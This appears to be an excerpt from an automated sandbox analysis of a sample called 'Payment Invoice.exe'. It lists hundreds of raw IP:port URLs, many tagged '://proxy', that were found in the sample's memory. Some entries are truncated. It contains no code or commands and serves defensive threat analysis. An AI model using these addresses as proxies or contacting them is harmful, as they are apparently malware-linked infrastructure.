                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.187.201.26:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.187.201.26:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.104.201:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.104.201:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.110.7:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.110.7:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.250.131:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.250.131:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.217.7.8:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.217.7.8:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.1.173:56974
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.1.173:56974://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.228.147:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.220.228.147:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C6D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.242.125.186:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.242.125.186:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.26.255.28:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.3.72.38:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.3.72.38:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.3.72.39:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.3.72.39:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.43.92.240:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.43.92.240:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.53.45.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.53.45.222:33333
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.53.45.222:33333://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.56.133:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.56.133:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.41.165:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.61.41.165:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.69.157.213:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.69.157.213:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.83.15.241:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.83.15.241:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.89.37.73:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.89.37.73:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.90.22.106:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.90.22.106:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.150:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.95.195.105:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.95.195.105:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.88:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.88:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.89:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.89:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.94:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.94:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.1.116
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.1.116://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.1.116:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.28:8085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.28:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.54:8085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.54:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.9:8085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.9:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.103.219.225:48612
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.103.219.225:48612://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.240.153.165:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.240.153.165:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.7.208.32:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.16.160:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.16.160:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.130.2:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.130.2:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.135.17:18302
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.135.17:18302://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.137.35:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.137.35:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.139.162:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.139.162:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.30.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.30.200:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.30.200:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.162.232.15:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.162.232.15:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631841E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.200:35396
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.200:35396://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:37327
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:37327://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:59559
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:59559://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181A3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631818D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:11720
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:11720://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:39095
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:39095://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:18646
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:18646://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:24787
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:24787://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:59524
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:59524://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:40886
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:40886://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:43100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:43100://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10185
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10185://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10722
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10722://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:39782
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:39782://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:47585
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:475850q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:47585://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:60964
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:60964://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.197.146:55137
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.197.146:55137://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:45366
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:45366://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:29618
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:29618://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:43328
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:43328://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:4850
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:4850://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.171.119.166:53149
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.171.119.166:53149://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.208.70:14282
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.208.70:14282://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.209.155:14455
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.209.155:14455://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163173DA000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163173BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.211.197:14921
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.211.197:14921://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.214.20:15864
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.214.20:15864://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.89:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.89:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.92:17328
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.92:17328://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.229.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.229.19:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.229.19:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:13003
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:13003://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:44523
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:44523://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.57.96:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.57.96:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.122.98.1:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.136.97.17://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.136.97.17:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.138.178.6:8282
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.138.178.6:8282://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.201:4444
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.201:4444://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.231.40.182:16099
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.231.40.182:16099://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128://proxy
